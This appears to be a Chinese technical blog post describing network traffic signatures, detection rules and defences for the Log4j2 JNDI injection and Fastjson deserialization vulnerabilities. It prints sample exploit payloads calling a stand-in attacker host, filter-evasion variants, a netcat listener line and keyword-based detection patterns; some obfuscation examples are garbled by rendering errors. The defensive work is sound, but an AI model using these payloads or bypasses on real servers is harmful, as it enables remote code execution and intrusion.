【HW系列】—Log4j2、Fastjson漏洞流量特征

本文仅用于技术研究，禁止用于非法用途。

Log4j2漏洞的流量特征及检测方法

Log4j2漏洞（CVE-2021-44228）的流量特征主要体现在JNDI协议注入、Payload构造技巧和响应行为异常等方面。以下是基于多篇技术文档整理的核心特征及检测策略：

JNDI协议标识
- 流量中直接包含 ${jndi:ldap://attacker.com/exp} 或$ {jndi:rmi://malicious-server/poc} 格式的字符串，常见于HTTP请求头（如User-Agent、Referer）或URL参数中。
- 示例：

http 复制代码

GET /search?q=${jndi:ldap://192.168.1.100:1389/Exploit} HTTP/1.1

编码混淆与绕过
- 大小写转换：使用 lower: 或 upper: 函数绕过关键字检测，如 KaTeX parse error: Expected '}', got 'EOF' at end of input: {{lower:J}ndi:ldap://...}。
- 特殊符号分割：利用 ${::-J} 或嵌套表达式（如 KaTeX parse error: Expected '}', got 'EOF' at end of input: {{env:key}}）混淆JNDI标识。
- URL编码：对Payload进行多重编码，例如 %24%7Bjndi%3Aldap%3A%2F%2F...（对应 ${jndi:ldap://...}）。
协议多样性
- 攻击者可能混合使用 ldap、rmi、dns 等协议，例如 ${jndi:dns://attacker.com/log} 用于信息外带。

异常外联行为
- 受害服务器向攻击者控制的LDAP/RMI服务器发起连接请求（如端口1389、1099），并尝试下载恶意类文件（如 Exploit.class）。
- 流量中可能伴随DNS查询记录，用于外带敏感信息（如环境变量 env:OS）。
多阶段攻击流量
- 第一阶段：通过HTTP请求注入JNDI表达式触发漏洞。
- 第二阶段：服务器连接LDAP/RMI服务获取恶意类文件。
- 第三阶段：执行远程代码后，可能建立反向Shell连接（如 nc -lvp 2333）或C2通信。

异常响应内容
- 成功利用时，响应包可能包含命令执行结果（如 whoami 输出）或异常堆栈中的JNDI类信息（如 javax.naming.InitialContext）。
- 响应长度突变：正常请求响应约200字节，执行恶意代码后因回显结果增至500字节以上。
日志异常
- 应用日志中出现大量含JNDI字符串的记录（如 ${jndi:ldap://...}）。
- 堆栈跟踪中暴露 JndiLookup 类调用链或 ClassNotFound 异常（因加载远程恶意类失败）。

协议与语法变形
- 添加冗余字符：如 ${jndi:ldap://attacker.com/ test}（URL末尾加空格）绕过简单正则检测。
- 利用环境变量嵌套：如 KaTeX parse error: Expected '}', got 'EOF' at end of input: {{env:PROTO}:-jndi}:ldap://...。
多协议组合利用
- 使用 ldap:// 触发漏洞后，通过HTTP协议下载恶意类文件，规避仅监控JNDI协议的规则。

流量检测规则
- 正则匹配：针对 ${.jndi:(ldap|rmi|dns).} 及变形表达式设计规则，覆盖大小写转换和编码混淆。
- 协议监控：拦截异常外联流量（如非业务端口的LDAP/RMI请求）。
防御策略
- 版本升级：升级至Log4j2 2.17.0+并移除 JndiLookup 类。
- 输入过滤：拦截含 ${、jndi: 的请求，禁用日志记录敏感参数。
- 网络隔离：限制服务器对外访问权限，阻断非常用协议端口。

Fastjson漏洞的流量特征主要围绕JSON反序列化机制与AutoType动态类加载展开，具体可从请求构造、攻击载荷、响应行为等维度分析。以下是综合多篇技术文档的核心特征及检测方法：

HTTP方法与数据类型
- POST请求为主：Fastjson漏洞通常通过POST方法发送JSON数据包。
- Content-Type标记：请求头中明确标识为 application/json，部分情况下可能伴随 charset=UTF-8 参数。
JSON结构异常
- @type字段注入：请求体中包含 @type 字段，指向危险类（如 com.sun.rowset.JdbcRowSetImpl、org.apache.tomcat.dbcp.BasicDataSource 等），用于触发动态类加载。
- 闭合错误：部分攻击载荷的JSON结构不完整，例如花括号未闭合，导致服务端解析异常。
协议与路径特征
- JNDI注入标识：请求中包含 ldap://、rmi:// 等协议地址，指向攻击者控制的服务器（如 dataSourceName:"rmi://attacker.com/Exploit"）。
- 编码混淆：攻击者可能对关键字段进行URL编码或大小写转换（如 %6a%6e%64%69 对应 jndi），以绕过基础检测规则。

状态码与错误信息
- 高频400/500状态码：因恶意JSON结构触发解析错误，服务器返回 400 Bad Request 或 500 Internal Server Error。
- 错误回显关键字：响应包中可能包含 fastjson、autoCommit、setter 等字段，或暴露反序列化堆栈信息（如 com.alibaba.fastjson.JSONException）。
无回显攻击特征
- DNSLog外带：利用无回显漏洞时，响应包可能包含DNSLog平台地址（如 dnslog.cn），通过DNS查询验证漏洞存在。
- 间接响应标识：成功触发漏洞后，可能返回 commit:true 或特定类加载标识（如 JavaBeanInfo 相关日志）。

经典攻击链构造
- JdbcRowSetImpl利用：通过 dataSourceName 和 autoCommit 字段触发JNDI注入（如 {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://attacker.com/exp"}）。
- TemplatesImpl类利用：植入恶意字节码至 _bytecodes 字段，结合 _outputProperties 的getter方法触发代码执行。
Tomcat环境适配
- BasicDataSource类攻击：针对Tomcat环境构造 org.apache.tomcat.dbcp.BasicDataSource 类，利用数据库连接池加载远程恶意配置。
- 版本适配差异：Tomcat 8.0前后分别使用 dbcp.BasicDataSource 和 dbcp2.BasicDataSource，攻击载荷需匹配目标环境。

流量检测规则
- 正则匹配：针对 @type、JdbcRowSetImpl、ldap:// 等关键字设计规则，覆盖大小写变形和编码混淆。
- 行为分析：监控高频400/500响应率（如单IP 1分钟内超过30次异常状态码）。
防御策略
- 升级至安全版本：Fastjson 1.2.83+ 启用 safemode 模式，或迁移至2.x版本。
- 关闭AutoType功能：通过启动参数 -Dfastjson.parser.autoTypeAccept= 限制动态类加载。
- 输入过滤与白名单：拦截包含 ${、jndi: 的请求，仅允许可信类名通过 ParserConfig.addAccept() 添加至白名单。
注：本文遵循CSDN社区内容规范，不涉及具体攻击实现，重点探讨防御方法论。